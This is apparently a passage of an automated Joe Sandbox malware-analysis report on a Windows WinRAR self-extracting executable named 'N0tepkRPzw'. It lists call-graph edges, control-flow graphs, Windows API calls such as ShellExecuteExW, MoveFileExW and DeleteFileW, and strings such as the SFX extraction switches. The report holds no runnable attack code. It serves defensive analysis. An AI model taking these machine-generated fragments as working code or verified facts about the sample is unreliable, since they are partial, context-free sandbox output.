24561->24603 24562->24310 24564 d58289 24563->24564 24609 d6179d CharUpperW 24564->24609 24566 d58333 24566->24313 24568 d57d7b 24567->24568 24569 d57dbb 24568->24569 24610 d57043 74 API calls 24568->24610 24569->24320 24571 d57db3 24611 d56dc1 74 API calls 24571->24611 24573->24374 24575 d59d73 24574->24575 24577 d59d82 24574->24577 24576 d59d79 FlushFileBuffers 24575->24576 24575->24577 24576->24577 24578 d59dfb SetFileTime 24577->24578 24578->24379 24579->24301 24580->24303 24581->24309 24582->24320 24583->24320 24584->24318 24585->24333 24586->24325 24587->24333 24588->24343 24589->24345 24590->24346 24591->24361 24592->24361 24593->24361 24594->24361 24595->24361 24596->24372 24597->24373 24604 d55c64 24598->24604 24600 d55d88 24600->24561 24602 d55c64 2 API calls 24602->24600 24603->24561 24607 d55c6e 24604->24607 24605 d55d56 24605->24600 24605->24602 24607->24605 24608 d5ad65 CharUpperW CompareStringW 24607->24608 24608->24607 24609->24566 24610->24571 24611->24569 24613 d5c8db 24612->24613 24618 d5a90e 84 API calls 24613->24618 24615 d5c90d 24619 d5a90e 84 API calls 24615->24619 24617 d5c918 24618->24615 24619->24617 24621 d5a5fe 24620->24621 24622 d5a691 FindNextFileW 24621->24622 24623 d5a621 FindFirstFileW 24621->24623 24624 d5a6b0 24622->24624 24625 d5a69c GetLastError 24622->24625 24626 d5a638 24623->24626 24631 d5a675 24623->24631 24624->24631 24625->24624 24627 d5b66c 2 API calls 24626->24627 24628 d5a64d 24627->24628 24629 d5a651 FindFirstFileW 24628->24629 24630 d5a66a GetLastError 24628->24630 24629->24630 24629->24631 24630->24631 24631->24248 24632->24049 24633->24057 24634->24057 24635->24060 24636->24067 24638 d59ef7 76 API calls 24637->24638 24639 d51f5b 24638->24639 24640 d519a6 97 API calls 24639->24640 24643 d51f78 24639->24643 24641 d51f68 24640->24641 24641->24643 24644 d56dc1 74 API calls 24641->24644 24643->24076 24643->24077 24644->24643 24783 d6b8e0 93 API calls _swprintf 24784 d68ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24787 d816e0 CloseHandle 24841 d72397 48 API calls 24649 d6d997 24650 d6d89b 24649->24650 24651 d6df59 ___delayLoadHelper2@8 19 API calls 24650->24651 24651->24650 24789 d67090 114 API calls 24790 d6cc90 70 API calls 24842 d6a990 97 API calls 24843 d69b90 GdipCloneImage GdipAlloc 24654 d6d891 19 API calls ___delayLoadHelper2@8 24844 d79b90 21 API calls 2 library calls 24792 d6a89d 78 API calls 24793 d5ea98 FreeLibrary 24660 d51385 82 API calls 3 library calls 24846 d75780 QueryPerformanceFrequency QueryPerformanceCounter 24795 d7ac0e 27 API calls DloadUnlock 24848 d779b7 55 API calls _free 24797 d516b0 84 API calls 24731 d790b0 24739 d7a56f 24731->24739 24735 d790cc 24736 d790d9 24735->24736 24747 d790e0 11 API calls 24735->24747 24738 d790c4 24740 d7a458 __dosmaperr 5 API calls 24739->24740 24741 d7a596 24740->24741 24742 d7a5ae TlsAlloc 24741->24742 24743 d7a59f 24741->24743 24742->24743 24744 d6ec4a DloadUnlock 5 API calls 24743->24744 24745 d790ba 24744->24745 24745->24738 24746 d79029 20 API calls 3 library calls 24745->24746 24746->24735 24747->24738 24748 d7a3b0 24750 d7a3bb 24748->24750 24749 d7a6ca 11 API calls 24749->24750 24750->24749 24751 d7a3e4 24750->24751 24753 d7a3e0 24750->24753 24754 d7a410 DeleteCriticalSection 24751->24754 24754->24753 24798 d71eb0 6 API calls 4 library calls 24799 d776bd 52 API calls 3 library calls 24800 d6e4a2 38 API calls 2 library calls 24802 d596a0 79 API calls 24852 d7e9a0 51 API calls 24853 d69b50 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 24806 d78050 8 API calls ___vcrt_uninitialize 23703 d6dc5d 23704 d6dc2e 23703->23704 23706 d6df59 23704->23706 23734 d6dc67 23706->23734 23708 d6df73 23709 d6dfd0 23708->23709 23722 d6dff4 23708->23722 23710 d6ded7 DloadReleaseSectionWriteAccess 11 API calls 23709->23710 23711 d6dfdb RaiseException 23710->23711 23730 d6e1c9 23711->23730 23712 d6e06c LoadLibraryExA 23714 d6e07f GetLastError 23712->23714 23715 d6e0cd 23712->23715 23713 d6ec4a DloadUnlock 5 API calls 23716 d6e1d8 23713->23716 23717 d6e092 23714->23717 23718 d6e0a8 23714->23718 23720 d6e0df 23715->23720 23721 d6e0d8 FreeLibrary 23715->23721 23716->23704 23717->23715 23717->23718 23723 d6ded7 DloadReleaseSectionWriteAccess 11 API calls 23718->23723 23719 d6e13d GetProcAddress 23724 d6e14d GetLastError 23719->23724 23729 d6e19b 23719->23729 23720->23719 23720->23729 23721->23720 23722->23712 23722->23715 23722->23720 23722->23729 23725 d6e0b3 RaiseException 23723->23725 23726 d6e160 23724->23726 23725->23730 23728 d6ded7 DloadReleaseSectionWriteAccess 11 API calls 23726->23728 23726->23729 23731 d6e181 RaiseException 23728->23731 23745 d6ded7 23729->23745 23730->23713 23732 d6dc67 ___delayLoadHelper2@8 11 API calls 23731->23732 23733 d6e198 23732->23733 23733->23729 23735 d6dc73 23734->23735 23736 d6dc99 23734->23736 23753 d6dd15 23735->23753 23736->23708 23739 d6dc94 23763 d6dc9a 23739->23763 23742 d6ec4a DloadUnlock 5 API calls 23743 d6df55 23742->23743 23743->23708 23744 d6df24 23744->23742 23746 d6df0b 23745->23746 23747 d6dee9 23745->23747 23746->23730 23748 d6dd15 DloadLock 8 API calls 23747->23748 23749 d6deee 23748->23749 23750 d6df06 23749->23750 23751 d6de67 DloadProtectSection 3 API calls 23749->23751 23772 d6df0f 8 API calls DloadUnlock 23750->23772 23751->23750 23754 d6dc9a DloadUnlock 3 API calls 23753->23754 23755 d6dd2a 23754->23755 23756 d6ec4a DloadUnlock 5 API calls 23755->23756 23757 d6dc78 23756->23757 23757->23739 23758 d6de67 23757->23758 23760 d6de7c DloadObtainSection 23758->23760 23759 d6de82 23759->23739 23760->23759 23761 d6deb7 VirtualProtect 23760->23761 23771 d6dd72 VirtualQuery GetSystemInfo 23760->23771 23761->23759 23764 d6dca7 23763->23764 23765 d6dcab 23763->23765 23764->23744 23766 d6dcb3 GetModuleHandleW 23765->23766 23767 d6dcaf 23765->23767 23768 d6dcc5 23766->23768 23769 d6dcc9 GetProcAddress 23766->23769 23767->23744 23768->23744 23769->23768 23770 d6dcd9 GetProcAddress 23769->23770 23770->23768 23771->23761 23772->23746 23773 d59b59 23774 d59bd7 23773->23774 23777 d59b63 23773->23777 23775 d59bad SetFilePointer 23775->23774 23776 d59bcd GetLastError 23775->23776 23776->23774 23777->23775 24808 d68c40 GetClientRect 24809 d6ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24810 d73040 5 API calls 2 library calls 24855 d6be49 98 API calls 3 library calls 24811 d80040 IsProcessorFeaturePresent 24856 d6d34e DialogBoxParamW 24812 d51075 82 API calls pre_c_initialization 24813 d65c77 121 API calls __vsnwprintf_l 23793 d6d573 23794 d6d580 23793->23794 23795 d5ddd1 53 API calls 23794->23795 23796 d6d594 23795->23796 23797 d5400a _swprintf 51 API calls 23796->23797 23798 d6d5a6 SetDlgItemTextW 23797->23798 23801 d6ac74 PeekMessageW 23798->23801 23802 d6ac8f GetMessageW 23801->23802 23803 d6acc8 23801->23803 23804 d6acb4 TranslateMessage DispatchMessageW 23802->23804 23805 d6aca5 IsDialogMessageW 23802->23805 23804->23803 23805->23803 23805->23804 24817 d6fc60 51 API calls 2 library calls 24819 d73460 RtlUnwind 24820 d79c60 71 API calls _free 24859 d56110 80 API calls 24860 d7b710 GetProcessHeap 24861 d6be49 108 API calls 4 library calls 24862 d51f05 126 API calls __EH_prolog 24823 d6ea00 46 API calls 6 library calls 24665 d6c40e 24666 d6c4c7 24665->24666 24674 d6c42c _wcschr 24665->24674 24667 d6c4e5 24666->24667 24683 d6be49 _wcsrchr 24666->24683 24700 d6ce22 24666->24700 24670 d6ce22 18 API calls 24667->24670 24667->24683 24668 d6aa36 ExpandEnvironmentStringsW 24668->24683 24670->24683 24671 d6ca8d 24672 d617ac CompareStringW 24672->24674 24674->24666 24674->24672 24675 d6c11d SetWindowTextW 24675->24683 24678 d735de 22 API calls 24678->24683 24680 d6bf0b SetFileAttributesW 24682 d6bfc5 GetFileAttributesW 24680->24682 24693 d6bf25 ___scrt_get_show_window_mode 24680->24693 24682->24683 24685 d6bfd7 DeleteFileW 24682->24685 24683->24668 24683->24671 24683->24675 24683->24678 24683->24680 24686 d6c2e7 GetDlgItem SetWindowTextW SendMessageW 24683->24686 24690 d6c327 SendMessageW 24683->24690 24694 d617ac CompareStringW 24683->24694 24695 d69da4 GetCurrentDirectoryW 24683->24695 24697 d5a52a 7 API calls 24683->24697 24698 d5a4b3 FindClose 24683->24698 24699 d6ab9a 76 API calls ___std_exception_copy 24683->24699 24685->24683 24687 d6bfe8 24685->24687 24686->24683 24688 d5400a _swprintf 51 API calls 24687->24688 24689 d6c008 GetFileAttributesW 24688->24689 24689->24687 24691 d6c01d MoveFileW 24689->24691 24690->24683 24691->24683 24692 d6c035 MoveFileExW 24691->24692 24692->24683 24693->24682 24693->24683 24696 d5b4f7 52 API calls 2 library calls 24693->24696 24694->24683 24695->24683 24696->24693 24697->24683 24698->24683 24699->24683 24701 d6ce2c ___scrt_get_show_window_mode 24700->24701 24702 d6cf1b 24701->24702 24708 d6d08a 24701->24708 24723 d617ac CompareStringW 24701->24723 24704 d5a180 4 API calls 24702->24704 24705 d6cf30 24704->24705 24706 d6cf4f ShellExecuteExW 24705->24706 24724 d5b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 24705->24724 24706->24708 24714 d6cf62 24706->24714 24708->24667 24709 d6cf47 24709->24706 24710 d6cf9b 24725 d6d2e6 6 API calls 24710->24725 24711 d6cff1 CloseHandle 24712 d6d00a 24711->24712 24713 d6cfff 24711->24713 24712->24708 24719 d6d081 ShowWindow 24712->24719 24726 d617ac CompareStringW 24713->24726 24714->24710 24714->24711 24716 d6cf91 ShowWindow 24714->24716 24716->24710 24718 d6cfb3 24718->24711 24720 d6cfc6 GetExitCodeProcess 24718->24720 24719->24708 24720->24711 24721 d6cfd9 24720->24721 24721->24711 24723->24702 24724->24709 24725->24718 24726->24712 24824 d6ec0b 28 API calls 2 library calls 24864 d6db0b 19 API calls ___delayLoadHelper2@8 24865 d6be49 103 API calls 4 library calls 24730 d7b731 31 API calls DloadUnlock 24825 d6a430 73 API calls 24826 d51025 29 API calls pre_c_initialization 24761 d59f2f 24762 d59f44 24761->24762 24763 d59f3d 24761->24763 24764 d59f4a GetStdHandle 24762->24764 24771 d59f55 24762->24771 24764->24771 24765 d59fa9 WriteFile 24765->24771 24766 d59f7c WriteFile 24767 d59f7a 24766->24767 24766->24771 24767->24766 24767->24771 24769 d5a031 24773 d57061 75 API calls 24769->24773 24771->24763 24771->24765 24771->24766 24771->24767 24771->24769 24772 d56e18 60 API calls 24771->24772 24772->24771 24773->24763

              Control-flow Graph

              APIs
                • Part of subcall function 00D600CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00D600E4
                • Part of subcall function 00D600CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D600F6
                • Part of subcall function 00D600CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D60127
                • Part of subcall function 00D69DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D69DAC
                • Part of subcall function 00D6A335: OleInitialize.OLE32(00000000), ref: 00D6A34E
                • Part of subcall function 00D6A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D6A385
                • Part of subcall function 00D6A335: SHGetMalloc.SHELL32(00D98430), ref: 00D6A38F
                • Part of subcall function 00D613B3: GetCPInfo.KERNEL32(00000000,?), ref: 00D613C4
                • Part of subcall function 00D613B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00D613D8
              • GetCommandLineW.KERNEL32 ref: 00D6D61C
              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D6D643
              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D6D654
              • UnmapViewOfFile.KERNEL32(00000000), ref: 00D6D68E
                • Part of subcall function 00D6D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D6D29D
                • Part of subcall function 00D6D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D6D2D9
              • CloseHandle.KERNEL32(00000000), ref: 00D6D697
              • GetModuleFileNameW.KERNEL32(00000000,00DADC90,00000800), ref: 00D6D6B2
              • SetEnvironmentVariableW.KERNEL32(sfxname,00DADC90), ref: 00D6D6BE
              • GetLocalTime.KERNEL32(?), ref: 00D6D6C9
              • _swprintf.LIBCMT ref: 00D6D708
              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D6D71A
              • GetModuleHandleW.KERNEL32(00000000), ref: 00D6D721
              • LoadIconW.USER32(00000000,00000064), ref: 00D6D738
              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00D6D789
              • Sleep.KERNEL32(?), ref: 00D6D7B7
              • DeleteObject.GDI32 ref: 00D6D7F0
              • DeleteObject.GDI32(?), ref: 00D6D800
              • CloseHandle.KERNEL32 ref: 00D6D843
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
              • API String ID: 788466649-3743209390
              • Opcode ID: 0f1d7fdd9c6a5c446f014503faf2d53a401bebeb1e4715d8f6a01fdf57c80134
              • Instruction ID: 1a509ebd963b9f7b97e49385af88a5d2e2317ec243a3b04e2edd45d2c3de5d2c
              • Opcode Fuzzy Hash: 0f1d7fdd9c6a5c446f014503faf2d53a401bebeb1e4715d8f6a01fdf57c80134
              • Instruction Fuzzy Hash: A061A271A04341AFD320AFA5EC49F2A3BA9EF46B45F040529F949D3391DB74D904DBB2

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 770 d69e1c-d69e38 FindResourceW 771 d69e3e-d69e50 SizeofResource 770->771 772 d69f2f-d69f32 770->772 773 d69e52-d69e61 LoadResource 771->773 774 d69e70-d69e72 771->774 773->774 775 d69e63-d69e6e LockResource 773->775 776 d69f2e 774->776 775->774 777 d69e77-d69e8c GlobalAlloc 775->777 776->772 778 d69e92-d69e9b GlobalLock 777->778 779 d69f28-d69f2d 777->779 780 d69f21-d69f22 GlobalFree 778->780 781 d69ea1-d69ebf call d6f4b0 778->781 779->776 780->779 785 d69ec1-d69ee3 call d69d7b 781->785 786 d69f1a-d69f1b GlobalUnlock 781->786 785->786 791 d69ee5-d69eed 785->791 786->780 792 d69eef-d69f03 GdipCreateHBITMAPFromBitmap 791->792 793 d69f08-d69f16 791->793 792->793 794 d69f05 792->794 793->786 794->793
              APIs
              • FindResourceW.KERNEL32(00D6AE4D,PNG,?,?,?,00D6AE4D,00000066), ref: 00D69E2E
              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00D6AE4D,00000066), ref: 00D69E46
              • LoadResource.KERNEL32(00000000,?,?,?,00D6AE4D,00000066), ref: 00D69E59
              • LockResource.KERNEL32(00000000,?,?,?,00D6AE4D,00000066), ref: 00D69E64
              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D6AE4D,00000066), ref: 00D69E82
              • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00D6AE4D,00000066), ref: 00D69E93
              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D69EFC
              • GlobalUnlock.KERNEL32(00000000), ref: 00D69F1B
              • GlobalFree.KERNEL32(00000000), ref: 00D69F22
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
              • String ID: PNG
              • API String ID: 4097654274-364855578
              • Opcode ID: ba270fca1980e1b6a53bb04e31d8e846886467b5e1efc0b5fe5e4031f9ab4f88
              • Instruction ID: 72b2e11907fda1fa0f51d0695c493079846d809dfdf1e81b42d3802e19cb6b24
              • Opcode Fuzzy Hash: ba270fca1980e1b6a53bb04e31d8e846886467b5e1efc0b5fe5e4031f9ab4f88
              • Instruction Fuzzy Hash: FA315C71214706AFC7119F61EC58A2BBBADFF89B51B090529F906D6361EB32DC00CBB1

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 971 d5a5f4-d5a61f call d6e360 974 d5a691-d5a69a FindNextFileW 971->974 975 d5a621-d5a632 FindFirstFileW 971->975 976 d5a6b0-d5a6b2 974->976 977 d5a69c-d5a6aa GetLastError 974->977 978 d5a6b8-d5a75c call d5fe56 call d5bcfb call d60e19 * 3 975->978 979 d5a638-d5a64f call d5b66c 975->979 976->978 980 d5a761-d5a774 976->980 977->976 978->980 986 d5a651-d5a668 FindFirstFileW 979->986 987 d5a66a-d5a673 GetLastError 979->987 986->978 986->987 988 d5a675-d5a678 987->988 989 d5a684 987->989 988->989 991 d5a67a-d5a67d 988->991 992 d5a686-d5a68c 989->992 991->989 994 d5a67f-d5a682 991->994 992->980 994->992
              APIs
              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D5A4EF,000000FF,?,?), ref: 00D5A628
              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D5A4EF,000000FF,?,?), ref: 00D5A65E
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D5A4EF,000000FF,?,?), ref: 00D5A66A
              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00D5A4EF,000000FF,?,?), ref: 00D5A692
              • GetLastError.KERNEL32(?,?,?,?,00D5A4EF,000000FF,?,?), ref: 00D5A69E
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: FileFind$ErrorFirstLast$Next
              • String ID:
              • API String ID: 869497890-0
              • Opcode ID: 5865b7273cc539e4622c9ef4f6fd81f04c0d36c10ad24431bb4fea33b47dc115
              • Instruction ID: abec75cfdc9389474d3889e807c09c012102f381287c08ca3d316351104225b7
              • Opcode Fuzzy Hash: 5865b7273cc539e4622c9ef4f6fd81f04c0d36c10ad24431bb4fea33b47dc115
              • Instruction Fuzzy Hash: 55418475504755AFC720EF68C884ADAF7E8FF48351F040A2AFDA9D3200D734A9588B72
              APIs
              • GetCurrentProcess.KERNEL32(00000000,?,00D77513,00000000,00D8BAD8,0000000C,00D7766A,00000000,00000002,00000000), ref: 00D7755E
              • TerminateProcess.KERNEL32(00000000,?,00D77513,00000000,00D8BAD8,0000000C,00D7766A,00000000,00000002,00000000), ref: 00D77565
              • ExitProcess.KERNEL32 ref: 00D77577
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: 4ff26d8b1d19578b7320ab3cc1e762e4137ddb795fc75fbb3305aa606fd97d7d
              • Instruction ID: 3d02ee31631594ffacb745253290e5f22d55969f7213d2c88cee167c17b421a4
              • Opcode Fuzzy Hash: 4ff26d8b1d19578b7320ab3cc1e762e4137ddb795fc75fbb3305aa606fd97d7d
              • Instruction Fuzzy Hash: D7E0B631014648ABCF11AF68DD09A593B69EB41B41F148814F90DCA222DB35DE42CB71
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: H_prolog_memcmp
              • String ID:
              • API String ID: 3004599000-0
              • Opcode ID: 3a2304a033a75d1611c8fc157fd3c249e3d0b2ca6b3c12c112c725aa60a583b3
              • Instruction ID: 7ced50f983d4101e80ef30efeb7a66fa4e14ce5b00587a9f883c7613dd569185
              • Opcode Fuzzy Hash: 3a2304a033a75d1611c8fc157fd3c249e3d0b2ca6b3c12c112c725aa60a583b3
              • Instruction Fuzzy Hash: AE822970904245AEDF25DB64C891BFABBB9EF15302F0C41BAEC59AB142DB315A4CDB70
              APIs
              • __EH_prolog.LIBCMT ref: 00D6AEE5
                • Part of subcall function 00D5130B: GetDlgItem.USER32(00000000,00003021), ref: 00D5134F
                • Part of subcall function 00D5130B: SetWindowTextW.USER32(00000000,00D835B4), ref: 00D51365
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: H_prologItemTextWindow
              • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
              • API String ID: 810644672-8108337
              • Opcode ID: 706041c9660f7b6cb2637430408e2efb956b74e42ab1805ef76fc1dda7c52cd8
              • Instruction ID: 1348ec826ef4081e031902e4093a0ec98a5aecca97ae71c7575933750754a0f0
              • Opcode Fuzzy Hash: 706041c9660f7b6cb2637430408e2efb956b74e42ab1805ef76fc1dda7c52cd8
              • Instruction Fuzzy Hash: FF42E271944344BFEB21ABA49C8AFBE7B7DEB02B11F040156F645E62D1CB744988CB72

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 257 d600cf-d600ee call d6e360 GetModuleHandleW 260 d60154-d603b2 257->260 261 d600f0-d60107 GetProcAddress 257->261 262 d60484-d604b3 GetModuleFileNameW call d5bc85 call d5fe56 260->262 263 d603b8-d603c3 call d770dd 260->263 264 d60121-d60131 GetProcAddress 261->264 265 d60109-d6011f 261->265 279 d604b5-d604bf call d5acf5 262->279 263->262 274 d603c9-d603fa GetModuleFileNameW CreateFileW 263->274 264->260 268 d60133-d60152 264->268 265->264 268->260 276 d603fc-d6040a SetFilePointer 274->276 277 d60478-d6047f CloseHandle 274->277 276->277 280 d6040c-d60429 ReadFile 276->280 277->262 286 d604c1-d604c5 call d60085 279->286 287 d604cc 279->287 280->277 282 d6042b-d60450 280->282 284 d6046d-d60476 call d5fbd8 282->284 284->277 293 d60452-d6046c call d60085 284->293 294 d604ca 286->294 290 d604ce-d604d0 287->290 291 d604f2-d60518 call d5bcfb GetFileAttributesW 290->291 292 d604d2-d604f0 CompareStringW 290->292 295 d6051a-d6051e 291->295 301 d60522 291->301 292->291 292->295 293->284 294->290 295->279 299 d60520 295->299 302 d60526-d60528 299->302 301->302 303 d60560-d60562 302->303 304 d6052a 302->304 305 d6066f-d60679 303->305 306 d60568-d6057f call d5bccf call d5acf5 303->306 307 d6052c-d60552 call d5bcfb GetFileAttributesW 304->307 317 d605e7-d6061a call d5400a AllocConsole 306->317 318 d60581-d605e2 call d60085 * 2 call d5ddd1 call d5400a call d5ddd1 call d69f35 306->318 313 d60554-d60558 307->313 314 d6055c 307->314 313->307 316 d6055a 313->316 314->303 316->303 323 d60667-d60669 ExitProcess 317->323 324 d6061c-d60661 GetCurrentProcessId AttachConsole call d735b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->324 318->323 324->323
              APIs
              • GetModuleHandleW.KERNEL32(kernel32), ref: 00D600E4
